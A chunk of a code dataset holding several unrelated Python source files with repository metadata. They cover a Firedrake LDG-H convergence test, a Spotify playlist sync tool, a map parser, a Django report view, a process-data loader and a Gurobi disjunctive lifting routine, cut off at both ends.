-----------------------------------------------------------------\n tau = O(1) (k>0) k+1 k+1 k+2 k+2 k+1 k+1\n tau = O(h) (k>0) k k+1 k+2 k+2 k+1 k+1\n tau = O(1/h) (k>0) k+1 k k+1 k+1 k k+1\n -----------------------------------------------------------------\n\n Note that the post-processing used for the flux q only holds for\n simplices (triangles and tetrahedra). If someone knows of a local\n post-processing method valid for quadrilaterals, please contact me!\n For these numerical results, we chose the following values of tau:\n\n tau = O(1) -> tau = 1,\n tau = O(h) -> tau = h,\n tau = O(1/h) -> tau = 1/h,\n\n where h here denotes the facet area.\n\n This demo was written by: Thomas H. Gibson (t.gibson15@imperial.ac.uk)\n \"\"\"\n\n if tau_order is None or tau_order not in (\"1\", \"1/h\", \"h\"):\n raise ValueError(\n \"Must specify tau to be of order '1', '1/h', or 'h'\"\n )\n\n assert degree > 0, \"Provide a degree >= 1\"\n\n # Set up problem domain\n mesh = UnitSquareMesh(2**r, 2**r, quadrilateral=False)\n x = SpatialCoordinate(mesh)\n n = FacetNormal(mesh)\n\n # Set up function spaces\n U = VectorFunctionSpace(mesh, \"DG\", degree)\n V = FunctionSpace(mesh, \"DG\", degree)\n T = FunctionSpace(mesh, \"HDiv Trace\", degree)\n\n # Mixed space and test/trial functions\n W = U * V * T\n s = Function(W, name=\"solutions\").assign(0.0)\n q, u, uhat = split(s)\n v, w, mu = TestFunctions(W)\n\n # Analytical solutions for u and q\n V_a = FunctionSpace(mesh, \"DG\", degree + 3)\n U_a = VectorFunctionSpace(mesh, \"DG\", degree + 3)\n\n u_a = Function(V_a, name=\"Analytic Scalar\")\n a_scalar = sin(pi*x[0])*sin(pi*x[1])\n u_a.interpolate(a_scalar)\n\n q_a = Function(U_a, name=\"Analytic Flux\")\n a_flux = -grad(a_scalar)\n q_a.project(a_flux)\n\n Vh = FunctionSpace(mesh, \"DG\", degree + 3)\n f = Function(Vh).interpolate(-div(grad(a_scalar)))\n\n # Determine stability parameter tau\n if tau_order == \"1\":\n tau = Constant(1)\n\n elif tau_order == \"1/h\":\n tau = 1/FacetArea(mesh)\n\n elif tau_order == \"h\":\n tau = FacetArea(mesh)\n\n else:\n raise ValueError(\"Invalid choice of tau\")\n\n # Numerical flux\n qhat = q + tau*(u - uhat)*n\n\n # Formulate the LDG-H method in UFL\n a = ((dot(v, q) - div(v)*u)*dx\n + uhat('+')*jump(v, n=n)*dS\n + uhat*dot(v, n)*ds\n - dot(grad(w), q)*dx\n + jump(qhat, n=n)*w('+')*dS\n + dot(qhat, n)*w*ds\n # Transmission condition\n + mu('+')*jump(qhat, n=n)*dS)\n\n L = w*f*dx\n F = a - L\n PETSc.Sys.Print(\"Solving using static condensation.\\n\")\n params = {'snes_type': 'ksponly',\n 'mat_type': 'matfree',\n 'pmat_type': 'matfree',\n 'ksp_type': 'preonly',\n 'pc_type': 'python',\n # Use the static condensation PC for hybridized problems\n # and use a direct solve on the reduced system for u_hat\n 'pc_python_type': 'firedrake.SCPC',\n 'pc_sc_eliminate_fields': '0, 1',\n 'condensed_field': {'ksp_type': 'preonly',\n 'pc_type': 'lu',\n 'pc_factor_mat_solver_type': 'mumps'}}\n\n bcs = DirichletBC(W.sub(2), Constant(0.0), \"on_boundary\")\n problem = NonlinearVariationalProblem(F, s, bcs=bcs)\n solver = NonlinearVariationalSolver(problem, solver_parameters=params)\n solver.solve()\n PETSc.Sys.Print(\"Solver finished.\\n\")\n\n # Computed flux, scalar, and trace\n q_h, u_h, uhat_h = s.split()\n\n # Now we compute the various metrics. First we\n # simply compute the L2 error between the analytic\n # solutions and the computed ones.\n scalar_error = errornorm(a_scalar, u_h, norm_type=\"L2\")\n flux_error = errornorm(a_flux, q_h, norm_type=\"L2\")\n\n # We keep track of all metrics using a Python dictionary\n error_dictionary = {\"scalar_error\": scalar_error,\n \"flux_error\": flux_error}\n\n # Now we use Slate to perform element-wise post-processing\n\n # Scalar post-processing:\n # This gives an approximation in DG(k+1) via solving for\n # the solution of the local Neumman data problem:\n #\n # (grad(u), grad(w))*dx = -(q_h, grad(w))*dx\n # m(u) = m(u_h) for all elements K, where\n #\n # m(v) := measure(K)^-1 * int_K v dx.\n\n # NOTE: It is currently not possible to correctly formulate this\n # in UFL. However, we can introduce a Lagrange multiplier and\n # transform the local problem above into a local mixed system:\n #\n # find (u, psi) in DG(k+1) * DG(0) such that:\n #\n # (grad(u), grad(w))*dx + (psi, grad(w))*dx = -(q_h, grad(w))*dx\n # (u, phi)*dx = (u_h, phi)*dx,\n #\n # for all w, phi in DG(k+1) * DG(0).\n DGk1 = FunctionSpace(mesh, \"DG\", degree + 1)\n DG0 = FunctionSpace(mesh, \"DG\", 0)\n Wpp = DGk1 * DG0\n\n up, psi = TrialFunctions(Wpp)\n wp, phi = TestFunctions(Wpp)\n\n # Create mixed tensors:\n K = Tensor((inner(grad(up), grad(wp)) +\n inner(psi, wp) +\n inner(up, phi))*dx)\n F = Tensor((-inner(q_h, grad(wp)) +\n inner(u_h, phi))*dx)\n\n E = K.inv * F\n\n PETSc.Sys.Print(\"Local post-processing of the scalar variable.\\n\")\n u_pp = Function(DGk1, name=\"Post-processed scalar\")\n assemble(E.blocks[0], tensor=u_pp)\n\n # Now we compute the error in the post-processed solution\n # and update our error dictionary\n scalar_pp_error = errornorm(a_scalar, u_pp, norm_type=\"L2\")\n error_dictionary.update({\"scalar_pp_error\": scalar_pp_error})\n\n # Post processing of the flux:\n # This is a modification of the local Raviart-Thomas projector.\n # We solve the local problem: find 'q_pp' in RT(k+1)(K) such that\n #\n # (q_pp, v)*dx = (q_h, v)*dx,\n # (q_pp.n, gamma)*dS = (qhat.n, gamma)*dS\n #\n # for all v, gamma in DG(k-1) * DG(k)|_{trace}. The post-processed\n # solution q_pp converges at the same rate as q_h, but is HDiv\n # conforming. For all LDG-H methods,\n # div(q_pp) converges at the rate k+1. This is a way to obtain a\n # flux with better conservation properties. For tau of order 1/h,\n # div(q_pp) converges faster than q_h.\n qhat_h = q_h + tau*(u_h - uhat_h)*n\n local_RT = FiniteElement(\"RT\", triangle, degree + 1)\n RTd = FunctionSpace(mesh, BrokenElement(local_RT))\n DGkn1 = VectorFunctionSpace(mesh, \"DG\", degree - 1)\n\n # Use the trace space already defined\n Npp = DGkn1 * T\n n_p = TrialFunction(RTd)\n vp, mu = TestFunctions(Npp)\n\n # Assemble the local system and invert using Slate\n A = Tensor(inner(n_p, vp)*dx +\n jump(n_p, n=n)*mu*dS + dot(n_p, n)*mu*ds)\n B = Tensor(inner(q_h, vp)*dx +\n jump(qhat_h, n=n)*mu*dS + dot(qhat_h, n)*mu*ds)\n\n PETSc.Sys.Print(\"Local post-processing of the flux.\\n\")\n q_pp = assemble(A.inv * B)\n\n # And check the error in our new flux\n flux_pp_error = errornorm(a_flux, q_pp, norm_type=\"L2\")\n\n # To verify our new flux is HDiv conforming, we also\n # evaluate its jump over mesh interiors. This should be\n # approximately zero if everything worked correctly.\n flux_pp_jump = assemble(jump(q_pp, n=n)*dS)\n\n error_dictionary.update({\"flux_pp_error\": flux_pp_error})\n error_dictionary.update({\"flux_pp_jump\": np.abs(flux_pp_jump)})\n\n PETSc.Sys.Print(\"Post-processing finished.\\n\")\n\n PETSc.Sys.Print(\"Finished test case for h=1/2^%d.\\n\" % r)\n\n # If write specified, then write output\n if write:\n if tau_order == \"1/h\":\n o = \"hneg1\"\n else:\n o = tau_order\n\n File(\"results/LDGH_tauO%s_deg%d.pvd\" %\n (o, degree)).write(q_a, u_a, q_h, u_h, u_pp)\n\n # Return all error metrics\n return error_dictionary, mesh\n\n\ndef compute_conv_rates(u):\n \"\"\"Computes the convergence rate for this particular test case\n\n :arg u: a list of errors.\n\n Returns a list of convergence rates. Note the first element of\n the list will be empty, as there is no previous computation to\n compare with. '---' will be inserted into the first component.\n \"\"\"\n\n u_array = np.array(u)\n rates = list(np.log2(u_array[:-1] / u_array[1:]))\n rates.insert(0, '---')\n return rates\n\n\ndef run_single_test(r, degree, tau_order, write=False):\n # Run a quick test given a degree, tau order, and resolution\n\n resolution_param = r\n PETSc.Sys.Print(\"Running LDG-H method (triangles) of degree %d with tau=O('%s') \"\n \"and mesh parameter h=1/2^%d.\" %\n (degree, tau_order, resolution_param))\n\n error_dict, _ = run_LDG_H_problem(r=resolution_param,\n degree=degree,\n tau_order=tau_order,\n write=write)\n\n PETSc.Sys.Print(\"Error in scalar: %0.8f\" %\n error_dict[\"scalar_error\"])\n PETSc.Sys.Print(\"Error in post-processed scalar: %0.8f\" %\n error_dict[\"scalar_pp_error\"])\n PETSc.Sys.Print(\"Error in flux: %0.8f\" %\n error_dict[\"flux_error\"])\n PETSc.Sys.Print(\"Error in post-processed flux: %0.8f\" %\n error_dict[\"flux_pp_error\"])\n PETSc.Sys.Print(\"Interior jump of post-processed flux: %0.8f\" %\n np.abs(error_dict[\"flux_pp_jump\"]))\n\n\ndef run_LDG_H_convergence(degree, tau_order, start, end):\n\n PETSc.Sys.Print(\"Running convergence test for LDG-H method (triangles) \"\n \"of degree %d with tau order '%s'\"\n % (degree, tau_order))\n\n # Create arrays to write to CSV file\n r_array = []\n scalar_errors = []\n scalar_pp_errors = []\n flux_errors = []\n flux_pp_errors = []\n flux_pp_jumps = []\n num_cells = []\n # Run over mesh parameters and collect error metrics\n for r in range(start, end + 1):\n r_array.append(r)\n error_dict, mesh = run_LDG_H_problem(r=r,\n degree=degree,\n tau_order=tau_order,\n write=False)\n\n # Extract errors and metrics\n scalar_errors.append(error_dict[\"scalar_error\"])\n scalar_pp_errors.append(error_dict[\"scalar_pp_error\"])\n flux_errors.append(error_dict[\"flux_error\"])\n flux_pp_errors.append(error_dict[\"flux_pp_error\"])\n flux_pp_jumps.append(error_dict[\"flux_pp_jump\"])\n num_cells.append(mesh.num_cells())\n\n # Now that all error metrics are collected, we can compute the rates:\n scalar_rates = compute_conv_rates(scalar_errors)\n scalar_pp_rates = compute_conv_rates(scalar_pp_errors)\n flux_rates = compute_conv_rates(flux_errors)\n flux_pp_rates = compute_conv_rates(flux_pp_errors)\n\n PETSc.Sys.Print(\"Error in scalar: %0.13f\" %\n scalar_errors[-1])\n PETSc.Sys.Print(\"Error in post-processed scalar: %0.13f\" %\n scalar_pp_errors[-1])\n PETSc.Sys.Print(\"Error in flux: %0.13f\" %\n flux_errors[-1])\n PETSc.Sys.Print(\"Error in post-processed flux: %0.13f\" %\n flux_pp_errors[-1])\n PETSc.Sys.Print(\"Interior jump of post-processed flux: %0.13f\" %\n np.abs(flux_pp_jumps[-1]))\n\n if COMM_WORLD.rank == 0:\n degrees = [degree] * len(r_array)\n data = {\"Mesh\": r_array,\n \"Degree\": degrees,\n \"NumCells\": num_cells,\n \"ScalarErrors\": scalar_errors,\n \"ScalarConvRates\": scalar_rates,\n \"PostProcessedScalarErrors\": scalar_pp_errors,\n \"PostProcessedScalarRates\": scalar_pp_rates,\n \"FluxErrors\": flux_errors,\n \"FluxConvRates\": flux_rates,\n \"PostProcessedFluxErrors\": flux_pp_errors,\n \"PostProcessedFluxRates\": flux_pp_rates}\n\n if tau_order == \"1/h\":\n o = \"hneg1\"\n else:\n o = tau_order\n\n df = pd.DataFrame(data)\n result = \"results/LDG-H-d%d-tau_order-%s.csv\" % (degree, o)\n df.to_csv(result, index=False, mode=\"w\")\n","repo_name":"thomasgibson/tabula-rasa","sub_path":"verification/LDGH/LDGH.py","file_name":"LDGH.py","file_ext":"py","file_size_in_byte":14704,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"613670828","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nParse SRF playlogs into spotify playlists\n\"\"\"\n\nimport sys\nimport spotipy\nimport spotipy.util as util\nimport logging\nimport argparse\nfrom any2spotify import *\n\ndef main(argv=None):\n parser = argparse.ArgumentParser(description='Sync feed with spotify playlist')\n parser.add_argument('username',help='spotify username/account to sync the playlist to')\n parser.add_argument('feed',help='podcast feed URL, e.g. http://podcasts.srf.ch/rock_special_mpx.xml')\n parser.add_argument('--id',required=False,default=None,help='spotify playlist ID to sync to. overrides the playlist name below.')\n parser.add_argument('--name',required=False,default=None,help='spotify playlist name to sync to. the playlist is created if there is no such playlist for the user. the podcast title is used if omitted.')\n parser.add_argument('-v','--verbose',help='output debug logging',action='store_true',default=False)\n parser.add_argument('-a','--add',help='only add songs to the playlist, dont remove them if missing from the feed',action='store_true',default=False)\n parser.add_argument('-l','--limit',help='limit the total number of tracks in the playist (useful with --add, default=0=no limit)',default=0)\n args = parser.parse_args()\n\n logformat = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG, format=logformat)\n else:\n logging.basicConfig(level=logging.INFO, format=logformat)\n logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARNING)\n\n logging.debug(args)\n\n token = spotipy.util.prompt_for_user_token(args.username,'playlist-modify-public')\n spotify = spotipy.Spotify(auth=token)\n\n sync_podcastfeed_with_playlist(feed=args.feed,spotify=spotify,spotifyusername=args.username,playlist_name=args.name,playlist_id=args.id,addonly=args.add,limit=args.limit)\n\nif __name__ == \"__main__\":\n \"\"\"Boilerplate main function call\"\"\"\n sys.exit(main(sys.argv))\n\n","repo_name":"arska/srf2spotify","sub_path":"srf2spotify.py","file_name":"srf2spotify.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"42869099869","text":"import logging\nimport inspect\t\n\nlogger = logging.getLogger(__name__)\n\nclass MapMatrix:\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef __init__(self, filename):\n\t\tself.map = self.read_map(filename)\n\n\tdef initialize_map(self, x_length, y_length):\n\t\tlogger.debug(\" (CALL) {}\".format(inspect.stack()[0][3]))\n\n\t\tmap = []\n\t\tfor y in range(y_length):\n\t\t\trow = []\n\t\t\tfor x in range(x_length):\n\t\t\t\trow.append(\"-\")\n\t\t\tmap.append(row)\n\t\tmap[-2][2] = \"M\"\n\n\t\tlogger.debug(\" (RTRN) {}\".format(inspect.stack()[0][3]))\n\t\treturn map\n\n\tdef read_map(self, filename):\n\t\tlogger.debug(\" (CALL) {}\".format(inspect.stack()[0][3]))\n\n\t\tlogger.info(\" Parsing {}\".format(filename))\n\t\tmap = []\n\t\tinput_file = open(filename)\n\t\tfor line in input_file:\n\t\t\tmap.append([])\n\t\t\t# line[-1] avoids getting the /n at the end\n\t\t\tfor char in line[:-1]:\n\t\t\t\tmap[-1].append(char)\n\n\t\tself.y_length = len(map)\n\t\tself.x_length = len(map[0])\n\t\n\t\t#logger.end(self, inspect.stack()[0][3])\n\t\tlogger.debug(\" (FINISHD){}\".format(inspect.stack()[0][3]))\n\t\treturn map\n\n\tdef print_map(self):\n\t\tlogger.debug(\" (CALL) {}\".format(inspect.stack()[0][3]))\n\t\tprint(\"Printing current map...\")\n\t\tprint(\"X tile length: {}, Y tile length: {}\".format(self.x_length, self.y_length))\n\t\tfor line in self.map:\n\t\t\tx_string = \"\"\n\t\t\tfor char in line:\n\t\t\t\tx_string += char\n\t\t\tprint(x_string)\n\t\t\n\t\tlogger.end(self, inspect.stack()[0][3])","repo_name":"ehauckdo/marioGraph","sub_path":"map_matrix.py","file_name":"map_matrix.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"10488989006","text":"import decimal\nfrom dateutil import parser, relativedelta\n\nfrom django.shortcuts import render, Http404\nfrom django.views import View\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.utils import timezone\n\nfrom adsrental.models.lead_history_month import LeadHistoryMonth\nfrom adsrental.models.bundler import Bundler\n\n\nclass BundlerCheckView(View):\n @method_decorator(login_required)\n def get(self, request, bundler_id):\n now = timezone.localtime(timezone.now())\n\n select_dates = []\n for months_ago in range(3, 0, -1):\n select_dates.append((now.replace(day=1) - relativedelta.relativedelta(months=months_ago)).date())\n\n date_str = request.GET.get('date')\n if date_str:\n date = parser.parse(date_str).replace(tzinfo=timezone.get_current_timezone()).date()\n else:\n date = select_dates[-1]\n\n bundler = Bundler.objects.filter(id=int(bundler_id)).first()\n if not bundler:\n raise Http404\n\n if not request.user.is_superuser and request.user.bundler != bundler:\n raise Http404\n\n lead_histories = LeadHistoryMonth.objects.filter(\n lead__bundler=bundler,\n date=date,\n move_to_next_month=False,\n ).select_related('lead', 'lead__raspberry_pi')\n total = decimal.Decimal('0.00')\n for lead_history in lead_histories:\n total += lead_history.get_remaining_amount()\n\n return render(request, 'bundler_report_check.html', context=dict(\n lead_histories=lead_histories,\n bundler=bundler,\n date_formatted=date.strftime('%B %Y'),\n date=date,\n select_dates=select_dates,\n total=total,\n ))\n","repo_name":"yonadav-labs/adsrental-dashboard","sub_path":"adsrental/views/bundler/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"38087129995","text":"import torch\r\nfrom torchvision.datasets import MNIST\r\nfrom torchvision.transforms import ToTensor\r\nfrom torch.utils.data import DataLoader,TensorDataset\r\nfrom sklearn import preprocessing\r\n\r\nimport scipy.io as scio\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport pandas\r\nimport os\r\nimport numpy as np\r\ndef getcluster():\r\n c = []\r\n c1 = [5, 8, 13, 26, 27, 29, 31, 32, 33, 37, 39, 40, 42, 46, 50]\r\n c2 = [0, 10, 15, 16, 17, 21, 24, 30, 34, 43, 51]\r\n c3 = [4, 20, 25, 28, 38]\r\n c4 = [1, 2, 7, 18, 19, 35, 41, 44, 45, 49]\r\n c5 = [3, 6, 9, 11, 12, 14, 22, 23, 36, 47, 48]\r\n c.append(c1)\r\n c.append(c2)\r\n c.append(c3)\r\n c.append(c4)\r\n c.append(c5)\r\n return c\r\ndef normalized_data(data):\r\n mu = data.mean(axis = 0)\r\n std = data.std(axis = 0)\r\n\r\n std = std\r\n t = (data - mu)/std\r\n\r\n return t, mu , std\r\n\r\ndef timewindow(samples ,windowlength ):\r\n\r\n sample_time = []\r\n for i in range(samples.shape[0]-windowlength+1):\r\n i = i+windowlength\r\n term = samples[i-windowlength:i,:]\r\n sample_time.append(np.concatenate(term,axis=0))\r\n sample_time_np = np.array(sample_time).reshape(-1,52*windowlength)\r\n return sample_time_np\r\ndef readnormal():\r\n filepath = r'D:\\TEDATA\\TEST'\r\n dpath = 'd00_te.dat'\r\n dDatapath = os.path.join(filepath, dpath)\r\n with open(dDatapath, 'r') as fr:\r\n data = fr.read()\r\n data = np.fromstring(data, dtype=np.float32, sep=' ')\r\n data = data.reshape(-1, 52)\r\n\r\n samples_Nocomp = data\r\n stdsc_00 = StandardScaler()\r\n mms_nor = MinMaxScaler()\r\n samples_Nocomp = stdsc_00.fit_transform(data)\r\n return samples_Nocomp\r\ndef readFile(IS_TRAIN,batch_size=20, window = False,windowl=2):\r\n c =getcluster()\r\n mms_00 = MinMaxScaler()\r\n stdsc_00 = StandardScaler()\r\n\r\n DATA = []\r\n LABEL = []\r\n filepath = r'D:\\TEDATA\\TEST'\r\n # dpath = ['d10train.csv','d11.dat', 'd16train.csv', 'd18.dat']\r\n dpath =['d00train.csv', 'd01train.csv', 'd02train.csv', 'd04train.csv', 'd05train.csv', 'd06train.csv', 'd07train.csv', 'd08train.csv','d10train.csv', 'd11train.csv',\r\n 'd12train.csv', 'd13train.csv', 'd14train.csv','d16train.csv', 'd17train.csv', 'd18train.csv', 'd19train.csv', 'd20train.csv']\r\n i = 0\r\n for Datapath in dpath:\r\n\r\n dDatapath = os.path.join(filepath, Datapath)\r\n\r\n if Datapath == 'd00train.csv':\r\n\r\n\r\n data = np.loadtxt(dDatapath, dtype=np.float32, delimiter=',')\r\n samples_Nocomp = data\r\n\r\n\r\n else:\r\n\r\n data = np.loadtxt(dDatapath, dtype=np.float32, delimiter=',')\r\n samples_Nocomp = data\r\n\r\n\r\n\r\n DATA.append(samples_Nocomp)\r\n\r\n label = i * np.ones(samples_Nocomp.shape[0])\r\n LABEL.append(label)\r\n i += 1\r\n\r\n data_TE_train = np.concatenate(np.array(DATA), axis=0)\r\n label_TE_train_s = np.concatenate(np.array(LABEL), axis=0)\r\n\r\n i=0\r\n DATA = []\r\n LABEL = []\r\n filepath = r'D:\\TEDATA\\TRAIN'\r\n\r\n dpath = ['d00test.csv', 'd01test.csv', 'd02test.csv', 'd04test.csv', 'd05test.csv','d06test.csv', 'd07test.csv','d08test.csv', 'd10test.csv','d11test.csv',\r\n 'd12test.csv','d13test.csv','d14test.csv','d16test.csv','d17test.csv','d18test.csv','d19test.csv','d20test.csv']\r\n for Datapath in dpath:\r\n\r\n dDatapath = os.path.join(filepath,Datapath)\r\n\r\n if Datapath == 'd00test.csv':\r\n\r\n data = np.loadtxt(dDatapath, dtype=np.float32, delimiter=',')\r\n samples_Nocomp = data\r\n\r\n\r\n else:\r\n\r\n data = np.loadtxt(dDatapath, dtype=np.float32, delimiter=',')\r\n samples_Nocomp = data\r\n\r\n DATA.append(samples_Nocomp)\r\n label = i * np.ones(samples_Nocomp.shape[0])\r\n LABEL.append(label)\r\n i +=1\r\n data_TE_test = np.concatenate(np.array(DATA), axis=0)\r\n label_TE_test_s = np.concatenate(np.array(LABEL), axis=0)\r\n i = 0\r\n DATA = []\r\n LABEL = []\r\n filepath = r'D:\\TEDATA\\TRAIN'\r\n\r\n dpath = ['d00validation.csv', 'd01validation.csv', 'd02validation.csv', 'd04validation.csv', 'd05validation.csv', 'd06validation.csv', 'd07validation.csv',\r\n 'd08validation.csv', 'd10validation.csv', 'd11validation.csv',\r\n 'd12validation.csv', 'd13validation.csv', 'd14validation.csv', 'd16validation.csv', 'd17validation.csv', 'd18validation.csv', 'd19validation.csv',\r\n 'd20validation.csv']\r\n for Datapath in dpath:\r\n\r\n dDatapath = os.path.join(filepath, Datapath)\r\n\r\n if Datapath == 'd00validation.csv':\r\n\r\n data = np.loadtxt(dDatapath, dtype=np.float32, delimiter=',')\r\n samples_Nocomp = data\r\n\r\n else:\r\n\r\n data = np.loadtxt(dDatapath, dtype=np.float32, delimiter=',')\r\n samples_Nocomp = data\r\n\r\n # samples_Nocomp = stdsc_00.transform(samples_Nocomp)\r\n # samples_Nocomp = mms_00.fit_transform(samples_Nocomp)\r\n\r\n # samples_Nocomp = samples_Nocomp[160:, :]\r\n DATA.append(samples_Nocomp)\r\n label = i * np.ones(samples_Nocomp.shape[0])\r\n LABEL.append(label)\r\n i += 1\r\n\r\n data_TE_valid = np.concatenate(np.array(DATA), axis=0)\r\n label_TE_valid_s = np.concatenate(np.array(LABEL), axis=0)\r\n stdsc = StandardScaler()\r\n mms = MinMaxScaler()\r\n # data_TE_train = mms.fit_transform(data_TE_train)\r\n\r\n data_TE_train = stdsc.fit_transform(data_TE_train)\r\n data_TE_test = stdsc.transform(data_TE_test)\r\n data_TE_valid = stdsc.transform(data_TE_valid)\r\n\r\n\r\n\r\n # data_TE_test = mms.transform(data_TE_test)\r\n\r\n\r\n\r\n\r\n if window==True:\r\n samplenum = []\r\n samplenum.append(0)\r\n orglendata = []\r\n data_w_train = []\r\n label_w_train =[]\r\n for i in range(len(dpath)):\r\n\r\n samplenum.append(np.sum(label_TE_train_s==i)+samplenum[i])\r\n orglendata.append(data_TE_train[samplenum[i]:samplenum[i+1]])\r\n for i in range(len(orglendata)):\r\n single = np.array(orglendata[i]).reshape(-1,52)\r\n Data = timewindow(single, windowlength=windowl)\r\n label = i * np.ones(Data.shape[0])\r\n data_w_train.append(Data)\r\n label_w_train.append(label)\r\n data_TE_train = np.concatenate(np.array(data_w_train), axis=0)\r\n # data_TE_train = stdsc_00.fit_transform(data_TE_train)\r\n label_TE_train = np.concatenate(np.array(label_w_train), axis=0)\r\n samplenum = []\r\n samplenum.append(0)\r\n orglendata = []\r\n data_w_test = []\r\n label_w_test = []\r\n for i in range(len(dpath)):\r\n samplenum.append(np.sum(label_TE_test_s == i) + samplenum[i])\r\n orglendata.append(data_TE_test[samplenum[i]:samplenum[i + 1]])\r\n for i in range(len(orglendata)):\r\n single = np.array(orglendata[i]).reshape(-1, 52)\r\n Data = timewindow(single, windowlength=windowl)\r\n label = i * np.ones(Data.shape[0])\r\n data_w_test.append(Data)\r\n label_w_test.append(label)\r\n data_TE_test = np.concatenate(np.array(data_w_test), axis=0)\r\n # data_TE_test = stdsc_00.fit_transform(data_TE_test)\r\n label_TE_test = np.concatenate(np.array(label_w_test), axis=0)\r\n samplenum = []\r\n samplenum.append(0)\r\n orglendata = []\r\n data_w_valid = []\r\n label_w_valid = []\r\n for i in range(len(dpath)):\r\n samplenum.append(np.sum(label_TE_valid_s == i) + samplenum[i])\r\n orglendata.append(data_TE_valid[samplenum[i]:samplenum[i + 1]])\r\n for i in range(len(orglendata)):\r\n single = np.array(orglendata[i]).reshape(-1, 52)\r\n Data = timewindow(single, windowlength=windowl)\r\n label = i * np.ones(Data.shape[0])\r\n data_w_valid.append(Data)\r\n label_w_valid.append(label)\r\n data_TE_valid = np.concatenate(np.array(data_w_valid), axis=0)\r\n # data_TE_test = stdsc_00.fit_transform(data_TE_test)\r\n label_TE_valid = np.concatenate(np.array(label_w_valid), axis=0)\r\n else:\r\n data_TE_train = data_TE_train\r\n label_TE_train = label_TE_train_s\r\n data_TE_test = data_TE_test\r\n label_TE_test = label_TE_test_s\r\n data_TE_valid = data_TE_valid\r\n label_TE_valid = label_TE_valid_s\r\n\r\n if IS_TRAIN == 'Train':\r\n data_TE_T = torch.tensor(data_TE_train).float()\r\n label_TE_T = torch.tensor(label_TE_train).long()\r\n dataloader = DataLoader(TensorDataset(data_TE_T, label_TE_T), batch_size=batch_size, shuffle=True,\r\n num_workers=1)\r\n return data_TE_train,label_TE_train, dataloader\r\n elif IS_TRAIN == 'Test':\r\n data_TE_T = torch.tensor(data_TE_test).float()\r\n label_TE_T = torch.tensor(label_TE_test).long()\r\n dataloader = DataLoader(TensorDataset(data_TE_T, label_TE_T), batch_size=batch_size, shuffle=False,\r\n num_workers=1)\r\n return data_TE_test, label_TE_test, dataloader\r\n elif IS_TRAIN == 'Valid':\r\n data_TE_T = torch.tensor(data_TE_valid).float()\r\n label_TE_T = torch.tensor(label_TE_valid).long()\r\n dataloader = DataLoader(TensorDataset(data_TE_T, label_TE_T), batch_size=batch_size, shuffle=False,\r\n num_workers=1)\r\n return data_TE_valid, label_TE_valid, dataloader\r\n\r\n\r\n\r\n\r\n# a = readFile(IS_TRAIN=False,batch_size=20,window=True,windowl=20)\r\n","repo_name":"heyumi0901/MBTCN","sub_path":"datapro.py","file_name":"datapro.py","file_ext":"py","file_size_in_byte":9518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"73022648772","text":"# -*- coding: utf-8 -*-\nimport gurobipy as gp\nimport numpy as np\nfrom gurobipy import *\nfrom numpy import linalg as LA\nimport sys\nimport struct\nfrom log import danoLogger\nfrom myutils import breakexit, askfordouble\nimport time\n\n\n\ndef lalift(alldata, liftingvariablename, vectordictionary): #distset_index):\n log = alldata['log']\n\n global MYDEBUG\n MYDEBUG = False\n\n\n # For now, in each iteration we will formulate and solve a new problem\n # The problem will consider a given binary variable: z_j\n # Given (x*, y*, z*) = target, the problem will compute the minimum distance from (x*,y*,z*) to the\n # projection, in (x,y,z) space, of the z_j - convexified lifted formulation of the problem,\n # That is to say, the convex hull of feasible solutions where z_j = 0 or 1.\n\n # The output is the nearest point to (x*,y*,z*) in the projection of the lifted formulation to (x,y,z) space.\n\n # liftingvariablename is the name of the binary variable being disjuncted\n # vectordictionary is a dictionary, indexed by variable name, containing\n # (x*, y*, z*)\n\n # The formulation in the lifted space will have four parts:\n # (a) A copy of the formulation multiplied by z_j and linearized; corresponding to z_j = 1.\n # (b) A copy of the formulation multiplied by 1-z_j and linearized; corresponding to z_j = 0.\n # (c) A constraint saying that (x,y,z) = (x1, y1, z1) + (x0, y0, z0), where the \"1\" or \"0\".\n # refers to the vector in (a) or (b), respectively.\n # (d) Have to handle individual variable bounds.\n # (e) Constraints and variables used to model the distance between (x,y,z) and (x*,y*,z*).\n\n \n # For (a) and (b) we will use the same code, where the \"1\" and \"0\" case are distinguished\n # using a flag. We need logic so as to\n\n #\n\n # (1) in the zero case, we need to \n # Keep track of the variables that are in set S_j (lhs coefficient becomes zero).\n # Appropriately handle rhs (e.g., >= 5 becomes 5 z_j >= 5).\n # Appropriately handle cardinality constraint.\n\n # (2) In the one case, \n # Appropriately handle rhs (e.g., >= 5 becomes -5 z_j >= 0).\n # Appropriately handle cardinality constraint.\n\n #\n\n # To help with this, varclass is used to keep track of the nature of variables\n # 'indicator' (binary), 'distance_sum' (y variable) and 'groundset' (x variable).\n\n\n distcount = alldata['distcount']\n distsize = alldata['distsize']\n distvarset = alldata['distvarset']\n distvar_owner = alldata['distvar_owner'] \n distvar_partner = alldata['distvar_partner']\n distconstr = alldata['distconstr']\n varSet = alldata['varSet']\n distset_byname = alldata['distset_byname']\n\n model = alldata['model']\n\n liftingvariable = model.getVarByName(liftingvariablename)\n distset_index = distset_byname[liftingvariablename]\n #liftingvariable = distvar_owner[distset_index]\n log.joint('Lifting using set %d variable %s\\n' %(distset_index, liftingvariable.varname))\n\n Dmodel = Model('disjunctmodel')\n\n # First we will create the variables used in the disjunction: \"_0\" and \"_1\".\n # Say that the lifting variable is z. Given another variable w, we write\n # w_1 to denote the linearized z*w and w_0 to denote the linearized (1 - z)*w\n # We also write: z_1 to model z and z_0 to model 1 - z\n 